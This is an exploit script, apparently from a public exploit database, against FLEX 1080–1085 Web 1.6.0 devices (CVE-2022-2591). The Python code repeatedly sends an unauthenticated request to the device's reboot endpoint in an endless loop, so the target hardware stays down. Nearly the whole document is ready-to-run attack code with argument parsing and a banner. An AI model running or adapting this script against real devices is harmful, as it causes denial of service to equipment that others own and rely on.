# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service # Date: 2023-05-06 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android # CVE ID: CVE-2022-2591 #!/usr/bin/env python3 import requests import re import argparse from colorama import Fore import time def main(): def banner(): print(''' ________ _______ __ / ____/ / / ____/ |/ / / /_ / / / __/ | / / __/ / /___/ /___ / | /_/ /_____/_____//_/|_| [FLEX 1080 < 1085 Web 1.6.0 - Denial of Service] ''') def reboot(): r = requests.get(f'http://{arguments.target}/sistema/flash/reboot') if 'Rebooting' in r.text: pass else: print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware não é vulnerável') quit() banner() print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque') while True: try: reboot() print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware derrubado com sucesso!') time.sleep(1) except: # print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware está inativo') pass if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target', action='store', help='Target', dest='target', required=True) arguments = parser.parse_args() try: main() except KeyError: quit()